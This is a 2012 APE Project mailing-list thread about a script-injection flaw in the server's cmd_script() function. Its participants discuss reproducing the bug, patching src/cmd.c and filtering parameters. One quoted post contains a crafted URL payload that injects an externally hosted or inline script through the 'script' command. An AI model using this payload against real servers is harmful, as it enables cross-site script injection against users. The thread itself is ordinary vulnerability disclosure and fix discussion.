Hi, thanks for you kind help I used yours and changed just the domain and the script to be injected. I also don't see where the error is and why it gives me BAD_JSON .
On Dec 13, 2:12 am, tr!ckle <[email protected]> wrote: > This function composes a html document which has only scripts and puts it > to the client. As i mentioned before it allows you to put whatever you want > into this document by preparing link. If you have BAD JSON error, just > check your link, it may be some typo in it (or in my first post but I > didn't find any). > > Workaround: > 1. check if domain is valid (cmd.c line 470) > 2. check if script is valid (cmd.c line 477) > > And that's it. > I hope this is helpful/ > > W dniu czwartek, 13 grudnia 2012 05:35:06 UTC+1 użytkownik UTAN napisał: > > > > > > > > > > > Ok, give me a shout out if you got more info, since I am testing on my > > testbed server.. > > > On Dec 12, 8:30 pm, Pablo Tejada <[email protected]> wrote: > > > I took a look at the cmd_script() and im no C savy but i dont think that > > > command does what we think it does. > > > > I personally thought it injected javascript directly into the server > > > enviroment but it doesn't looks like it, i have to test it and see. > > > On Dec 12, 2012 11:09 PM, "UTAN" <[email protected]> wrote: > > > > > Pablo, > > > > > I don't seem to duplicate it. > > > > > I have put your your hook as follow > > > > Ape.registerHookCmd('script', function(){ > > > > Ape.log('Script was called > > sussefully'); > > > > //return false; > > > > }); > > > > > and tried to run tru Ape server URL .. and doesn't log anything... > > > > But manage to find the function on that file mentioned above.. > > > > > On Dec 12, 4:58 pm, Pablo Tejada <[email protected]> wrote: > > > > > You would have to patch the file, rebuild the server and replace the > > > > > generated aped file with the one in your installation. > > > > > > Before digging into the source can you verify if the hook i > > mentioned > > > > above > > > > > fixes this bug? > > > > > On Dec 12, 2012 7:52 PM, "UTAN" <[email protected]> wrote: > > > > > > > Indeed , thanks for point it out Pablo.. > > > > > > Now what should i just edit and patch and the file and then reload > > Ape > > > > > > or I have to reinstall all over? > > > > > > > On Dec 12, 10:20 am, Pablo Tejada <[email protected]> wrote: > > > > > > > He did mentioned src/cmd.c > > > > > > > On Dec 12, 2012 1:15 PM, "UTAN" <[email protected]> > > wrote: > > > > > > > > > Have you released any patch, if you made some workaround what > > file > > > > > > > > should we patch? > > > > > > > > > On Dec 11, 3:56 am, tr!ckle <[email protected]> wrote: > > > > > > > > > I managed recently with an issue that allows to inject any > > js > > > > script > > > > > > by > > > > > > > > > preparing link like: > > >http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscrip...]}}]<http://your.ape.server.domain/?[%7B%22cmd%22:%22script%22,%22params%22:%7B%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscrip...]%7D%7D]> > > > > > > > > > > It allows either attach script from your url or inject > > script > > > > > > directly > > > > > > > > such > > > > > > > > > as in this example. > > > > > > > > > > The solution for this issue is to filter both params domain > > and > > > > > > scripts > > > > > > > > in > > > > > > > > > file src/cmd.c (function: cmd_script()) in ape server. > > > > > > > > > -- > > > > > > > > You received this message because you are subscribed to the > > Google > > > > > > > > Groups "APE Project" group. > > > > > > > > To post to this group, send email to > > > > > > > > [email protected]<javascript:> > > > > > > > > To unsubscribe from this group, send email to > > > > > > > > [email protected] <javascript:> > > > > > > > > For more options, visit this group at > > > > > > > >http://groups.google.com/group/ape-project?hl=en > > > > > > > > --- > > > > > > > > APE Project (Ajax Push Engine) > > > > > > > > Official website :http://www.ape-project.org/ > > > > > > > > Git Hub :http://github.com/APE-Project/ > > > > > > > -- > > > > > > You received this message because you are subscribed to the Google > > > > > > Groups "APE Project" group. > > > > > > To post to this group, send email to > > > > > > [email protected]<javascript:> > > > > > > To unsubscribe from this group, send email to > > > > > > [email protected] <javascript:> > > > > > > For more options, visit this group at > > > > > >http://groups.google.com/group/ape-project?hl=en > > > > > > --- > > > > > > APE Project (Ajax Push Engine) > > > > > > Official website :http://www.ape-project.org/ > > > > > > Git Hub :http://github.com/APE-Project/ > > > > > -- > > > > You received this message because you are subscribed to the Google > > > > Groups "APE Project" group. > > > > To post to this group, send email to > > > > [email protected]<javascript:> > > > > To unsubscribe from this group, send email to > > > > [email protected] <javascript:> > > > > For more options, visit this group at > > > >http://groups.google.com/group/ape-project?hl=en > > > > --- > > > > APE Project (Ajax Push Engine) > > > > Official website :http://www.ape-project.org/ > > > > Git Hub :http://github.com/APE-Project/ -- You received this message because you are subscribed to the Google Groups "APE Project" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [email protected] For more options, visit this group at http://groups.google.com/group/ape-project?hl=en --- APE Project (Ajax Push Engine) Official website : http://www.ape-project.org/ Git Hub : http://github.com/APE-Project/
